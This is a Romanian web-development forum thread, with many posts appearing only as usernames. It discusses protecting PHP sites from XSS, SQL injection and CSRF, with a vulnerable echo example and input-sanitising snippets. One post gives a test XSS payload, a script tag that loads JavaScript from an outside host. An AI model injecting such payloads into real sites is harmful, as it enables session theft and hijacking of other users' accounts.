Folosire XSS pentru a trece de protectia CSRF

[Poyo]

[lucki91]

sa zicem ca un site, are o multime de probleme de securitate de genul:

echo 'Salut'.$_GET['ceva'].'';

in cazurile astea intr-adevar pagina dar si alte informatii sunt vulnerabile.

Cum ar putea cineva sa isi protejeze in 2 pasi site-ul, ca sa nu mai trebuasca sa editeze paginile?

[Birkoff]

tinand cont ca $_POST $_GET $_COOKIE $_REQUEST sunt niste variabile de tip array, poate sa le verifice si sa le modifice intr-o functie la inceputul paginii apoi in pagina sa le preia gata modificate...

exemplu

// Fix input variables
if (get_magic_quotes_gpc())
{
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
}

pe aceeasi idee ca mai sus se pot scrie functii ca sa verifice valorile din fiecare get sau post si sa le modifice corespunzator

[Poyo]

[Pirahna]

[Birkoff]

[vectorialpx]

[Birkoff]

[kleampa]

[vectorialpx]

[Poyo]

[szerky]

interesant articolul tau;

sql inj.
personal fac cam toate interogarile cu valori intregi. exceptie un search ( sau de genul ).
de (int)/intval() nu trece nimic.

csrf, fol. niste campuri hidden, cu valori pe care le stiu doar eu .

xss, atat zf cat si ci au methode proprii de filtrare. in rest fol. htmlentities(). n-am incercat sa dau bypass la htmlentities(), nici nu am idee cat la % din vectori filtreaza insa ... daca a testat cineva ar fi util sa stim si noi.

piranha: inseamna ca-s deja vulnerabile la XSS.

incearca sa introduci : <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

[Pirahna]

[szerky]

[Pirahna]